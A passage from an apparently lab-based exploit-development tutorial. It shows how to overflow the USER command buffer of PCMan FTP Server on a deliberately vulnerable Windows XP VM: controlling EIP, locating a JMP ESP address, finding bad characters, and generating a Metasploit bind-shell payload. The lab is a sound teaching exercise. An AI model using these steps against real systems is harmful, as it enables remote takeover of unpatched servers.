- Explaining fuzzer4.pl ($header,$junk,$eip,$padding)
- Instructions:
- Arrow #1, [Line 37],
Assign variable($header) to "USER
". In order to provide a username to a FTP server (ie
PCMan), you must first specify the string (USER
) followed by a <space>
and then the actual username.
- Arrow #2, [Line 45],
Assign the ($junk) variable to the product of the hexadecimal value
of A(x41) multiplied by the OFFSET COUNT obtained from (Section
12, Step 18).
- E.g., $junk =
- Arrow #3, [Line 54],
Assign the ($eip) variable to the product of the hexadecimal value
of B(x42) multiplied by 4.
- Arrow #4, [Line 58],
Assign the ($padding) variable to the product of the hexadecimal
value of C(x43) multiplied by 500.
- E.g., $junk =

- Explain fuzzer4.pl ($string,$socket,send,close)
- Instructions:
- Arrow #1 [Line 59],
Assign the ($string) variable contain the sequential merger of the
$header, $junk, $eip, and $padding variables.
- Arrow #2 [Line 59],
Establish a TCP Network Socket Connection and assign to
the ($socket) variable.
- Arrow #3, [Line 63],
Use the $socket->send($string)
to send the ($string) variable to the $socket TCP Network Connection.
- Arrow #4, [Line 63],
Use the close($socket)
function to
close the $socket TCP Network Connection.
- Arrow #5, Click the
icon to
close leafpad.

- Over Writing the EIP (On Kali 1.0.5)
- Note(FYI):
- Replace (
with your Damn Vulnerable WXP-SP2 Address found in (Section 1, Step
- Replace (2003)
with the offset you obtain from the last step in the
- Instructions:
- ./fuzzer4.pl
21 2003
- Note(FYI):
- Arrow
#1, Use (fuzzer4.pl) to send a string that looks like the
) -
Remember we are attacking the variable that stores the
username, so we have to tell PCMan that our username will follow
the string (USER
- (AAAA(2003)AAAA's...)
- This contains the number of (A's) that was specified from
your offset. Remember we determined that
2003 bytes occur (in my
case) before the EIP can be overwritten.
- (BBBB)
- These (B's) are actually represented in the following 4
bytes hexadecimal string (42424242). Our goal is to
overwrite and place (42424242) into the EIP Register.
If we can accomplish this, then we can control what is
executed next.
- (CCCC(500)CCCCC)
- The (C's) or it's hexadecimal representation service as an
obvious line of demarcation that follows the 4 (B's)

- Observing fuzzer4.pl results on PCMan (On Damn Vulnerable WXP-SP2)
- Instructions:
- Notice that OllyDbg is currently paused
) because
PCMan crashed.
- Click on the up arrow(
5 times.
- Notice that both the ESP and ESI
register points to strings that contain a bunch of (C's).
- Notice that the EIP now contains the
BBBB Hexadecimal Value of (42424242)In the lower left window, notice the
second column of registry values that contain many 4 bytes strings
of (41414141).
- Notice immediately after the 4 bytes
strings of (41414141), there is a new string of (42424242), which is
our only 4 byte string of BBBB's.
- Notice immediately after the
only 4 byte string (42424242),
many 4 byte values of all C's (43434343) follows.
- Note(FYI):
- Arrow #3, Notice that we have successfully
overwritten the EIP with the string (42424242). Remember the
EIP is a special register that points to the instruction that is
going to be executed next. One of the reasons for the crash is
because the 4 byte string (42424242) is not a valid memory address,
which causes an access violation.

- Start PCMan FTP Server (On Damn Vulnerable WXP-SP2)
- Instructions:
- Left
Click on the EIP Value(42424242),
Right Click to popup a menu
- Select Copy all registers to
- Click the Close Icon (
- Open Notepad
- Instructions:
- Click the Start Button
- All Programs --> Accessories -->

- Paste into Notepad
- Instructions:
- Edit --> Paste
- Notepad Save Add
- Instructions:
- File --> Save As...
- Navigate to the following directory
- File name: eip_control.txt
- Click the Save Button

Section 14: PCMan -
Jumping with the EIP |
- Section Notes
- Notes(FYI):
- In the previous section,
our goal was to overwrite the EIP. The theory is if we can
overwrite the EIP with whatever we want, then we control where the
EIP points. This is important,
because the EIP is a special register that
points to the instruction that is going to be executed next.
- In this section, we will find a valid
memory location that we can use to tell the EIP where to jump.
- Start PCMan FTP Server (On Damn Vulnerable WXP-SP2)
- Instructions:
- Right Click on PCMANFTPD2
- Click on Open

- PCMan is Online
- Note(FYI):
- Notice the FTP Server is
- I apologize for the
repetitive starting and stopping of the FTP Server.

- Instructions:
- Right Click on the
OLLYDBG Desktop Icon
- Select Open
- Attach OLLYDBG to PCMan Process (Part 1)
- Instructions:
- File --> Attach

- Attach OLLYDBG to PCMan Process (Part 2)
- Instructions:
- Click on PCManFTPD2
- Click on the Attach
- Note(FYI):
- Arrow #1, Make
sure PCManFTPD2 is highlighted in light gray.
- Arrow #2, OLLYDBG is an x86 debugger that will allow us to view and trace
memory locations, registers, determine offsets, determine which DLLs
are used, and a lot more.

- List OLLYDBG Executable Modules
- Instructions:
- Click the blue(E)
- Note(FYI):
- Arrow
executable modules feature provides a list of all the dll's that are
being used by PCMan.

- Selecting the SHELL32.dll
- Instructions:
- Double click on
- Note(FYI):
- Arrow
#1, According to
Peleus (@0x42424242)
and verified by Computer Security Student, that the USER32.DLL also
contains a JMP ESP(7E429353) that you can use as well. In
addition, there are many other possibilities using msvcrt.dll.

- Searching for the JMP ESP
- Instructions:
- Right Click in the White
Area of Upper Left Window
- Search for --> Command
- Find Command:
- Click the Find

- Set Break Point
- Instructions:
- Double click on (FFE4)
- The JMP ESP(7C9D30D7)
Address should be highlighted in Red
- Note(FYI):
- Arrow
#1, The purpose of
setting a break point is to later demonstrate how to step through a
program and watch not only the registers, but also the value contained in
the registers after the EIP executes the JMP ESP.

- Copy JMP ESP Address
- Instructions:
- Right Click on (7C9D30D7)
- Copy --> To clipboard

- Open Notepad
- Instructions:
- Click the Start Button
- All Programs --> Accessories -->

- Paste into Notepad
- Instructions:
- Edit --> Paste
- Little Endian
- Instructions:
- View Picture and Transpose the JMP ESP
Address in Little Endian Order.
- Copy the Address which will be used in
Step 17.
- Note(FYI):
- Arrow #1, Bit and Byte Order for x86
architecture (IA-32 processor) is little-endian. To illustrate data
structures in memory, smaller addresses appear toward the bottom of the
below figure; addresses increase toward the top. Bit positions are
numbered from right to left. The numerical value of a set bit is equal
to two raised to the power of the bit position. IA-32 processors are
"little endian" machines; this means the bytes of a word are numbered
starting from the least significant byte.

- Arrow #2, Remember to copy your

- Notepad JMP ESP Information
- Instructions:
- File --> Save As...
- Navigate to the following directory
- File name: eip_jmp_esp.txt
- Click the Save Button

- Play OllyDbg
- Instructions:
- Click on OllyDbg icon(
in the taskbar
- Make sure (7C9D30D7)
is highlighted
- If not highlighted, doubled click
on FFE4.
- Click the Play Icon (
and paused ( )
will change to running ( )

- Open fuzzer5.pl (On Kali 1.0.5)
- Instructions:
- leafpad fuzzer5.pl
- Note(FYI):
- Arrow
#1, Use (leafpad) to open (fuzzer5.pl). leafpad is a
simple GTK+ based text editor. The user interface is similar to the
Windows notepad.

- Explain fuzzer5.pl ($eip,$string)
- Instructions:
- Select Options and Check
Word Wrap
and Line
- Scroll Down to Line 61
and view the transposed JMP ESP.
- Notice the composition of
the new $string
- Click the
icon to
close leafpad.
- Note(FYI):
- Arrow
#2 [Line 61], The ($eip) variable contains the transposed JMP ESP for
- Arrow
#3 [Line 69], The ($string) variable now contains the sequential
merger of the $header(USER
), $junk offset(2000+ A's), $eip(D7309D7C),
and the $padding(500 C's) variables.

- Over Writing the EIP (On Kali 1.0.5)
- Note(FYI):
- Replace (
with your Damn Vulnerable WXP-SP2 Address found in (Section 1, Step
- Replace (2003)
with the offset you obtain from the last step in the
- Instructions:
- ./fuzzer5.pl
21 2003
- Note(FYI):
- Arrow
#1, Use (fuzzer5.pl) to send a string that looks like the
) -
Remember we are attacking the variable that stores the
username, so we have to tell PCMan that our username will follow
the string (USER
- (AAAA(2003)AAAA's...)
- This contains the number of (A's) that was specified from
your offset. Remember we determined that
2003 bytes occur (in my
case) before the EIP can be overwritten.
- (D7309D7C)
- This is the memory address of the JMP ESP for the
SHELL32.dll. This is the next piece of the puzzle that
will allow us to point the EIP at the JMP ESP(D7309D7C)
which allows us to jump into the buffer of C's(43..43).
- (CCCC(500)CCCCC)
- The (C's) or its hexadecimal representation (x43), serves as an
obvious line of demarcation that follows the JMP ESP(D7309D7C).

- Break Point Results (On Damn Vulnerable WXP-SP2)
- Instructions:
- Notice that OllyDbg is currently paused
) because
PCMan crashed.
- Click on the up arrow(
5 times.
- Notice that the EIP now contains the
JMP ESP Memory Location (7C9D30D7)
- Memory Location (7C9D30D7)
is the static JMP ESP for the SHELL32.DLL.
- Notice that (7C9D30D7)
is preceded with 2000+
A's(41..41) and followed by 500
- Note(FYI):
- Arrow 3, Previously our goal was
to write 4 B's(42424242) to the EIP register, because it points to
the instruction that is going to be executed next.
Consequently, the EIP instruction of 4 B's(42424242) is replaced
with the JMP ESP memory location (7C9D30D7)
taken from the SHELL32.DLL for the following reasons: (1) This
memory location will not change for this DLL running on Windows XP
and (2) it is a valid address that will allow us to execute a

- Stepping Into Fake Payload
- Instructions:
- Click the Step Into Icon(
5 times.
- When you click on the Step Into Icon(
each assembly instruction is executed.
- Notice that the assembly instructions
are all INC EBX
- Click the Close Icon (
to close OllyDbg.
- Note(FYI):
- Arrow 1, The Step Into Icon
allows you to walk through each assembly instruction.
- Arrow #2, These are assembly
instructions with their corresponding values. As you can see
each value is a C(43). If you are really bored you can click
the Step Into Icon(
) a total of 500 times until there is nothing left
to execute.
- Arrow #3, The EBX Register is
Base pointer to data in the data segment. The INC EBX
increments the base pointer by one. In our case, 1 to 500.

Section 15: PCMan -
Searching for Bad Characters (Part 1) |
- Section Notes
- Notes(FYI):
- In the previous sections (1) we
discovered how many bytes it would take to crash PCMan, (2) we
determined the offset, which is number of bytes necessary to occur
before the EIP can be over overwritten, (3) we established we could
control what was written into the EIP (4) we extracted a good JMP
ESP static memory location from SHELL32.dll, and (5) we were able to
jump into our fake payload of 500 Cs.
- Over the following three sections we
will use the complete hexadecimal number sequence to help us
determine bad hexadecimal characters. Bad hexadecimal characters are
those characters which will cause our payload to fail because PCMan
either (1) interprets them to have special meaning AND/OR (2) they
cause mis-alignment in our payload.
- Start PCMan FTP Server (On
Damn Vulnerable WXP-SP2)
- Instructions:
- Right Click on PCMANFTPD2
- Click on Open

- PCMan is Online
- Note(FYI):
- Notice the FTP Server is
- I apologize for the
repetitive starting and stopping of the FTP Server.

- Instructions:
- Right Click on the
OLLYDBG Desktop Icon
- Select Open
- Attach OLLYDBG to PCMan Process (Part 1)
- Instructions:
- File --> Attach

- Attach OLLYDBG to PCMan Process (Part 2)
- Instructions:
- Click on PCManFTPD2
- Click on the Attach
- Note(FYI):
- Arrow #1, Make
sure PCManFTPD2 is highlighted in light gray.
- Arrow
#2, OLLYDBG is an x86 debugger that will allow us to view and trace
memory locations, registers, determine offsets, determine which DLLs
are used, and a lot more.

- Start OllyDbg
- Instructions:
- Notice that OllyDbg is currently paused
- Click the Play Icon (
and paused ( )
will change to running ( )
- Click PCMan located in the taskbar (
- Note(FYI):
- Arrow #1, PCMan is
kind of in a locked stated until the Play Icon is clicked.
- Arrow #3, You are
asked to click on PCMan in the task tray to bring the PCMan
application to foreground so you can watch the subsequent buffer
overflow attempts.

- Open fuzzer6a.pl with leafpad (On Kali 1.0.5)
- Instructions:
- leafpad ./fuzzer6a.pl >
/dev/null 2>&1
- Note(FYI):
- Arrow
#1, Use (leafpad) to open up the perl script (fuzzer6a.pl).
Use (2>&1) to send all standard error into standard output.
Re-direct all standard output into a virtual black hole (>
/dev/null) to not see any errors when opening or closing the file.

- Open fuzzer6a.pl with leafpad
- Instructions:
- Select Options and Check
Word Wrap
and Line
- Scroll Down to Line 70
- Notice the 3 underlined
Hex Values (\x00,
\x0a, and
- Click the
icon to
close leapad.
- Note(FYI):
- Arrow
#2, The variable ($allhexchars) contains a complete sequential
list of all the Hexadecimal characters from 00 to FF.
- Arrow
#3, The 3 underlined Hex Values (\x00,
\x0a, and
\x0d) are considered bad
characters, because of what they represent. We will be testing the program to see if our fake payload
stays in alignment. Remember
want to be able to step through our fake payload, just like we were
to step through all the 500 C's without error. We
want the same thing to eventually occur for all known good Hex
\x00 - Null Byte
(Universally Bad)
\x0a - Carriage Return
\x0d - New Line

- Bad Hexadecimal Character Testing[x00 x0A x0D]
- Note(FYI):
- Instructions:
- ./fuzzer6a.pl
21 2003
- Note(FYI):
- Arrow
#1, Use (fuzzer6a.pl) to send a string that looks like the
) -
Remember we are attacking the variable that stores the
username, so we have to tell PCMan that the username that we
will be supplying will follow the string e.g., (USER
- (AAAA(2003)AAAA's...)
- This is our extra long username that contains the number
of (A's) that was specified from your offset. Remember
we determined that 2003
bytes occur (in my case) before the EIP can be overwritten.
- (D7309D7C)
- This is the memory address of the JMP ESP extracted from the
SHELL32.dll. This JMP ESP address will allow us to
jump into the hex sequence (00..FF).
- (x00x01..x09x0Ax0Bx0Cx0D..xFF)
- The goal of this test is to figure out which payload
characters will cause PCMan to mis-align our Hex Sequence
List. Remember we
replaced all the 500 C's with the complete sequential
Hexadecimal list.

- Analyzing the Null Byte [x00] (On Damn Vulnerable XP-SP2)
- Instructions:
- Click on the up arrow(
5 to 6 times.
- Notice all the
A'S(41414141) that occur before the JMP ESP(7C9D30D7)
- Notice the JMP ESP(7C9D30D7)
immediately follows the 2000+ A'S(41414141)
- Notice the line
immediately following JMP ESP(7C9D30D7)
does not start with 00.
- Click the Close Icon (
to close OllyDbg.
- Note(FYI):
- Arrow
#4, Let's say x00(null byte) was not a bad character, you would
expect to see the following string (03 02 01 00) immediately after
the JMP ESP(7C9D30D7).
Instead, the string starts with 0D. Since, the first character
00 was not in the correct order, then we can assume with high
suspicion that 00 is a bad character.

Section 16: PCMan -
Searching for Bad Characters (Part 2) |
- Section Notes
- Notes(FYI):
- In the previous section, we learned
that placing null byte (00) in our sequential hexadecimal list will cause
a mis-alignment in our payload.
- In this section we will discover that
a carriage return byte (0A) will also cause a mis-alignment in our payload.
- Please don't get discourage with the
step by step repetition. The theme of all my Hac-King-Do
students should be to (WaxOn[1] and WaxOff[0]), because it is not
only our "Modus Operandi", but it is our culture.
- Start PCMan FTP Server (On Damn Vulnerable WXP-SP2)
- Instructions:
- Right Click on PCMANFTPD2
- Click on Open

- PCMan is Online
- Note(FYI):
- Notice the FTP Server is
- I apologize for the
repetitive starting and stopping of the FTP Server.

- Instructions:
- Right Click on the
OLLYDBG Desktop Icon
- Select Open
- Attach OLLYDBG to PCMan Process (Part 1)
- Instructions:
- File --> Attach

- Attach OLLYDBG to PCMan Process (Part 2)
- Instructions:
- Click on PCManFTPD2
- Click on the Attach
- Note(FYI):
- Arrow #1, Make
sure PCManFTPD2 is highlighted in light gray.
- Arrow #2, OLLYDBG is an x86 debugger that will allow us to view and trace
memory locations, registers, determine offsets, determine which DLLs
are used, and a lot more.

- Start OllyDbg
- Instructions:
- Notice that OllyDbg is currently paused
- Click the Play Icon (
and paused ( )
will change to running ( )
- Click PCMan located in the taskbar (
- Note(FYI):
- Arrow #1, PCMan is
kind of in a locked state until the Play Icon is clicked.
- Arrow #3, You are
asked to click on PCMan in the task tray to bring the PCMan
application to foreground so you can watch the subsequent buffer
overflow attempts.

- Open fuzzer6b.pl with leafpad (On Kali 1.0.5)
- Instructions:
- leafpad ./fuzzer6b.pl >
/dev/null 2>&1
- Note(FYI):
- Arrow
#1, Use (leafpad) to open up the perl script (fuzzer6b.pl).
Use (2>&1) to send all standard error into standard output.
Re-direct all standard output into a virtual black hole (>
/dev/null) to not see any errors when opening or closing the file.

- View fuzzer6b.pl with leafpad (On Kali 1.0.5)
- Instructions:
- Select Options and Check
Word Wrap
and Line
- Scroll Down to Line 70
- Notice that null byte (\x00)
has been removed
- Notice the
2 underlined Hex Values (\x0a,
and \x0d).
- Click the
icon to
close leafpad.
- Note(FYI):
- Arrow
#3, In the previous section we learned the (\x0a)
was a bad character because after the JMP ESP(D7309D7C) was processed,
the ($allhexchars) payload became mis-aligned after receiving a null byte(\x00).
- Arrow
#4, The 2 underline Hex
Values (\x0a, and
\x0d) are considered bad
characters, because of what they represent. We will be testing each
byte to see if PCMan will process our fake payload as it reads it
byte for byte.
\x00 - Null Byte
(Universally Bad and already removed)
\x0a - Carriage Return
\x0d - New Line

- Testing the Carriage Return [0A](On Kali 1.0.5)
- Note(FYI):
- Instructions:
- ./fuzzer6b.pl
21 2003
- Note(FYI):
- Arrow
#1, Use (fuzzer6b.pl) to send a string that looks like the
) -
Remember we are attacking the variable that stores the
username, so we have to tell PCMan that the username that we
will be supplying will follow the string (USER
). E.g., (USER
- (AAAA(2003)AAAA's...)
- This is our extra long username that contains the number
of (A's) that was specified from your offset. Remember
we determined that 2003
bytes occur (in my case) before the EIP can be overwritten.
- (D7309D7C)
- This is the memory address of the JMP ESP for the
SHELL32.dll. This JMP ESP address will allow us to
jump into the hex sequence (01..FF).
- (x01..x09x0Ax0Bx0Cx0D..xFF)
- The goal of this test is to figure out which hexadecimal
characters will cause a mis-alignment in our
payload. Previously, we removed the null byte(x00), and now we are
testing the carriage return(x0A).

- Analyzing Bad Character [x0A] (On Damn Vulnerable XP-SP2)
- Instructions:
- Click on the up arrow(
5 to 6 times.
- Notice all the
A'S(41414141) that occur before the JMP ESP(7C9D30D7)
- Notice the JMP ESP(7C9D30D7)
immediately follows the 2000+ A'S(41414141)
- Notice the line
immediately following the JMP ESP(7C9D30D7)
is in correct order (04 03 02 01).
- Notice the line
immediately following (04 03 02 01)
is in correct order (08 07 06 05).
- Notice the line
immediately following (08 07 06 05)
is NOT in
correct order (0C 0B
0A 09).
- Click the Close Icon (
to close OllyDbg.
- Note(FYI):
- Arrow
#6, Let's say x0A(carriage return) was not a bad character, you would
expect to see the following string (0C 0B
0A 09) immediately after
the line containing (08 07 06 05).
Instead in (00 0A
0D 09),
the 0A does not immediately
follow 09. Since, there is
another mis-alignment we can safely assume that
0A is also a bad character that
we need to remove.

Section 17: PCMan -
Searching for Bad Characters (Part 3) |
- Section Notes
- Notes(FYI):
- In the previous sections, we learned
that placing null byte (00) and carriage return (0A) in our future payload will cause
a mis-alignment in our payload.
- In this section, we will discover that
placing a new line byte (0D) in our payload will also cause another mis-alignment.
- I hope you are getting mentally soar from more
of our Modus Operandi
- Start PCMan FTP Server (On Damn Vulnerable WXP-SP2)
- Instructions:
- Right Click on PCMANFTPD2
- Click on Open

- PCMan is Online
- Note(FYI):
- Notice the FTP Server is
- I apologize for the
repetitive starting and stopping of the FTP Server.

- Instructions:
- Right Click on the
OLLYDBG Desktop Icon
- Select Open
- Attach OLLYDBG to PCMan Process (Part 1)
- Instructions:
- File --> Attach

- Attach OLLYDBG to PCMan Process (Part 2)
- Instructions:
- Click on PCManFTPD2
- Click on the Attach
- Note(FYI):
- Arrow #1, Make
sure PCManFTPD2 is highlighted in light gray.
- Arrow #2, OLLYDBG is an x86 debugger that will allow us to view and trace
memory locations, registers, determine offsets, determine which DLLs
are used, and a lot more.

- Start OllyDbg
- Instructions:
- Notice that OllyDbg is currently paused
- Click the Play Icon (
and paused ( )
will change to running ( )
- Click PCMan located in the taskbar (
- Note(FYI):
- Arrow #1, PCMan is
kind of in a locked state until the Play Icon is clicked.
- Arrow #3, You are
asked to click on PCMan in the task tray to bring the PCMan
application to foreground, so you can watch the subsequent buffer
overflow attempts.

- Open fuzzer6c.pl with leafpad (On Kali 1.0.5)
- Instructions:
- leafpad ./fuzzer6c.pl >
/dev/null 2>&1
- Note(FYI):
- Arrow
#1, Use (leafpad) to open up the perl script (fuzzer6c.pl).
Use (2>&1) to send all standard error into standard output.
Re-direct all standard output into a virtual black hole (>
/dev/null) to not see any errors when opening or closing the file.

- Open fuzzer6c.pl with leafpad (On Kali 1.0.5)
- Instructions:
- Select Options and Check
Word Wrap
and Line
- Scroll Down to Line 70
- Notice that null byte(\x00)
and carriage return(\x0a)
have been removed
- Notice the
1 underlined Hex Values (\x0d)
that remains
- Click the
icon to
close leafpad.
- Note(FYI):
- Arrow
#3, In the previous section we learned the (\x0a)
was a bad character because the line immediately following (08
07 06 05)
was NOT in
correct order (0C 0B
0A 09).
Instead in (00 0A
0D 09),
the 0A did not immediately
follow 09.
- Arrow
#4, The remaining 1 underlined Hex
Value (\x0d) is also considered
a bad
hex character, because it represents a new line.
\x00 - Null Byte
(Universally Bad and removed)
\x0a - Carriage Return
\x0d - New Line

- Testing the Carriage Return [x0D](On Kali 1.0.5)
- Note(FYI):
- Instructions:
- ./fuzzer6c.pl
21 2003
- Note(FYI):
- Arrow
#1, Use (fuzzer6c.pl) to send a string that looks like the
) -
Remember we are attacking the variable that stores the
username, so we have to tell PCMan that the username that we
will be supplying will follow the string (USER
- (AAAA(2003)AAAA's...)
- This is our extra long username that contains the number
of (A's) that was specified from your offset. Remember
we determined that 2003
bytes occur (in my case) before the EIP can be overwritten.
- (D7309D7C)
- This is the memory address of the JMP ESP for the
SHELL32.dll. This JMP ESP address will allow us to
jump into the hex sequence (01..FF).
- (x01..x09x0Bx0Cx0D..xFF)
- The goal of this test is to figure out which hexadecimal
payload character will cause a mis-alignment. Previously, we removed the null byte(x00) and carriage
return(x0A), and now we are
testing (x0D).

- Analyzing Bad Character [x0D] (On Damn Vulnerable XP-SP2)
- Instructions:
- Click on the up arrow(
5 to 6 times.
- Notice all the
A'S(41414141) that occur before the JMP ESP(7C9D30D7)
- Notice the JMP ESP(7C9D30D7)
immediately follows the 2000+ A'S(41414141)
- Notice the line
immediately following the JMP ESP(7C9D30D7)
is in correct order (04 03 02 01).
- Notice the line
immediately following (04 03 02 01)
is in correct order (08 07 06 05).
- Notice the line
immediately following (08 07 06 05)
be in correct order (0D
0C 0B 09).
- Notice the line
immediately following (0D
0C 0B 09) EXHIBITS a
strange behavior (00
00 00 0A).
I thought we removed (0A) and (00)?
- Click the Close Icon (
to close OllyDbg.
- Note(FYI):
- Arrow
#6-#7, Let's say x0D(new line) was not a bad character, you would
expect to see the following line (11 10 0F
0E) immediately after
the line containing (0D
0C 0B 09). Instead in (00
00 00 0A),
the 0A does not immediately
follow 09. Furthermore, we
removed both (00) and (0A). Since,
there is another mis-alignment immediately following the (0D),
then we can safely assume that 0D
is also a bad character that we need to remove.

Section 18: PCMan -
Using Good Characters |
- Section Notes
- Notes(FYI):
- In the previous sections, we learned
that placing a null byte (00), a
carriage return (0A), and a new
line (0D) in our future payload will cause
a mis-alignment. I don't know about you, but I feel
like we have been singing that Christmas Song (A Partridge in a pear
tree) in hexadecimal over the past few sections.
- In this section, we will see how our
hexadecimal sequential list appears in order, since all the bad
characters have been removed.
- This point is very important, because
our future payload (windows/shell_bind_tcp) will not work, unless
all bad characters are removed.
- Start PCMan FTP Server (On Damn Vulnerable WXP-SP2)
- Instructions:
- Right Click on PCMANFTPD2
- Click on Open

- PCMan is Online
- Note(FYI):
- Notice the FTP Server is
- I apologize for the
repetitive starting and stopping of the FTP Server.

- Instructions:
- Right Click on the
OLLYDBG Desktop Icon
- Select Open
- Attach OLLYDBG to PCMan Process (Part 1)
- Instructions:
- File --> Attach

- Attach OLLYDBG to PCMan Process (Part 2)
- Instructions:
- Click on PCManFTPD2
- Click on the Attach
- Note(FYI):
- Arrow #1, Make
sure PCManFTPD2 is highlighted in light gray.
- Arrow #2, OLLYDBG is an x86 debugger that will allow us to view and trace
memory locations, registers, determine offsets, determine which DLLs
are used, and a lot more.

- Start OllyDbg
- Instructions:
- Notice that OllyDbg is currently paused
- Click the Play Icon (
and paused ( )
will change to running ( )
- Click PCMan located in the taskbar (
- Note(FYI):
- Arrow #1, PCMan is
kind of in a locked state until the Play Icon is clicked.
- Arrow #3, You are
asked to click on PCMan in the task tray to bring the PCMan
application to foreground, so you can watch the subsequent buffer
overflow attempts.

- Open fuzzer6d.pl with leafpad (On Kali 1.0.5)
- Instructions:
- leafpad ./fuzzer6d.pl >
/dev/null 2>&1
- Note(FYI):
- Arrow
#1, Use (leafpad) to open up the perl script (fuzzer6d.pl).
Use (2>&1) to send all standard error into standard output.
Re-direct all standard output into a virtual black hole (>
/dev/null) to not see any errors when opening or closing the file.

- View fuzzer6d.pl with leafpad (On Kali 1.0.5)
- Instructions:
- Select Options and Check
Word Wrap
and Line
- Scroll Down to Line 70
- Notice that the null byte(\x00),
the carriage return(\x0a),
and new line(\x0d)
have been removed
- Click the
icon to
close leafpad.
- Note(FYI):
- Arrow
#3, In the previous sections we learned the null byte(\x00),
the carriage return(\x0a),
and new line(\x0d) can
all cause PCMan to mis-align and not process our payload, therefore they have been removed.

- Testing without Bad Characters(On Kali 1.0.5)
- Note(FYI):
- Instructions:
- ./fuzzer6d.pl
21 2003
- Note(FYI):
- Arrow
#1, Use (fuzzer6d.pl) to send a string that looks like the
) -
Remember we are attacking the variable that stores the
username, so we have to tell PCMan that the username will
follow the string (USER
- (AAAA(2003)AAAA's...)
- This is the extra long username that contains the number
of (A's) that was specified from your offset. Remember
we determined that 2003
bytes occur (in my case) before the EIP can be overwritten.
- (D7309D7C)
- This is the memory address of the JMP ESP for the
SHELL32.dll. This JMP ESP address will allow us to
jump into the hex sequence (01..FF).
- (x01..x09x0Bx0C..xFF)
- The goal of this test to visually see the entire Hex
sequence from x01 to xFF, minus the bad characters (x00,
x0A, and x0D). Accomplishing this task will allow us
to know which characters to not put in our payload to help
ensure a successful exploit implementation.

- Analyzing Good Characters (On Damn Vulnerable XP-SP2)
- Instructions:
- Click on the up arrow(
5 to 6 times.
- Notice all the
A'S(41414141) that occur before the JMP ESP(7C9D30D7)
- Notice the JMP ESP(7C9D30D7)
immediately follows the 2000+ A'S(41414141)
- Notice the lines
immediately following the JMP ESP(7C9D30D7)
are in correct order:
- (04
03 02 01)...(1A 19 18 17)...(1A
19 18 17)...(00 0A 0D
- Any ideas why (00
0A 0D) trails (FF)?
- Click the Close Icon (
to close OllyDbg.
- Note(FYI):
- Arrow
#4, Now our Hexadecimal sequence is in perfect order, minus the
bad characters (00, 0A, 0D). If you did not fail asleep and
you are on your 5th full cup of Turkish Coffee, you might have
scrolled down to the end of the Hex Sequence and saw this odd
behavior (00 0A 0D
FF). The reason why you see (00
0A 0D) after (FF) is
because we are at the end of our Hex Sequence and we have just
closed the connection, which causes a new line(0D),
carriage return(0A) and a null
byte(00) to be produced.

Section 19: Combining msfpayload with
our buffer overflow script |
- Section Notes
- Notes(Goals):
- In the previous sections, we learned
that placing a null byte (00), a
carriage return (0A), and a new
line (0D) in our future payload will cause PCMan
to not process our payload, because of mis-alignment issues.
- In this section, we will show you how
to use msfpayload
to generate the (windows/shell_bind_tcp)
payload in raw format(R)
that listens on port(LPORT=5555)
that exits(EXITFUNC=seh)
using the structured exception handler (SEH), while using (msfencode)
to encode and ignore bad characters(-b
'\x00\x0a\x0d') and output the (windows/shell_bind_tcp)
payload in a perl format (-t
perl -e x86/alpha_upper).
- Example:
R |
-b '\x00\x0a\x0d'
-t perl -e x86/alpha_upper
- Notes(msfpayload
- The EXITFUNC option effectively sets a
function hash in the payload that specifies a DLL and function to
call when the payload is complete. There are 4 different values for
EXITFUNC : seh, thread, process and none. Usually the EXITFUNC is
set to thread or process, which corresponds to the ExitThread or
ExitProcess calls. The "none" technique will call GetLastError,
which is effectively a no-op. The thread will then continue
executing, allowing you to simply join(ie., cat) multiple payloads
together to be run in serial. EXITFUNC will be useful in some cases
where you need a clean exit of an exploited machine.
- The SEH EXITFUNC method should be used
when there is a structured exception handler (SEH) that will restart
the thread or process automatically when an error occurs.
- The THREAD EXITFUNC method is used in
most exploitation scenarios where the exploited process (e.g.
Internet Explo[d]er) runs the shellcode in a sub-thread and exits
the thread results in a working application/system (clean exit).
This method is used in most exploitation scenarios where the
exploited process (e.g. IE) runs the shellcode in a sub-thread
and exiting this thread results in a working application/system
(clean exit) - See more at: http://www.hacking-tutorial.com/tips-and-trick/what-is-metasploit-exitfunc/#sthash.4iFGq4ZC.dpuf
This method is used in most exploitation scenarios where the
exploited process (e.g. IE) runs the shellcode in a sub-thread
and exiting this thread results in a working application/system
(clean exit) - See more at: http://www.hacking-tutorial.com/tips-and-trick/what-is-metasploit-exitfunc/#sthash.4iFGq4ZC.dpuf
- List msfpayload Framework Payloads (On Kali 1.0.5)
- Instructions:
- msfpayload -l
- Notes(FYI):
- Arrow #1, Use (msfpayload -l) to
list all the MSF Framework Payloads. The (msfpayload) command
is a command line instance of Metasploit that is used to generate
and output all of the various types of shellcodes that are available
in this version of Metasploit. Notice for this particular version, there are
310 total payloads for various Operation Systems (AIX, Android, BSD,
Windows, etc).

- msfpayload windows/shell_bind_tcp summary
- Instructions:
- msfpayload windows/shell_bind_tcp S
- Notice the option EXITFUNC
- Notice the option LPORT
- Notes(FYI):
- Arrow #1, Use (msfpayload) to
show summary(S) information for the (windows/shell_bind_tcp)
- Arrow #2, Use the (EXITFUNC) to
specify a clean exit using the structured exception handler (SEH).
- Arrow #3, Use (LPORT) to specify
the listening port that you can remotely connect to with tools like
netcat, telnet and others.

- msfencode options
- Instructions:
- msfencode -h
- Use -b to ignore or exclude bad
- Use -e to use a specific encoder
- Use -t to specify to code output format
- Notes(FYI):
- Arrow #1, Use (msfencode -h) to
specify the general use options.

- List msfencode encoders
- Instructions:
- msfencode -l
- We will later use the (x86/alpha_upper)
- Notes(FYI):
- Arrow #1, Use (msfencode -l) to
list MSF Framework Encoders.

- Creating Our Payload
- Instructions:
R |
-b '\x00\x0a\x0d'
-t perl -e x86/alpha_upper
- Notes(FYI):
- Arrow #1, Use
msfpayload to
generate the (windows/shell_bind_tcp)
payload in raw format(R)
that listens on port(LPORT=5555)
that exits(EXITFUNC=seh)
using the structured exception handler (SEH), while using (msfencode)
to encode and ignore bad characters(-b
'\x00\x0a\x0d') and output the (windows/shell_bind_tcp)
payload in a perl format (-t
perl -e x86/alpha_upper)
- Arrow #2, The ($buf) variable is
set to the payload value generated for (windows/shell_bind_tcp).

- Open fuzzer7.pl
- Instructions:
- leafpad fuzzer7.pl
- Notes(FYI):
- Arrow #1, Use (leafpad) to open

- Explain fuzzer7.pl (Command Line Arguments)
- Instructions:
- Select Options and Check
Word Wrap
and Line
- Scroll Down to Line 17
- Note(FYI):
- Arrow #2, The perl
script (fuzzer7.pl) requires the following three parameters: <IPADDRESS>,
<PORT>, and <OFFSET_COUNT>. Where <OFFSET_COUNT> is the
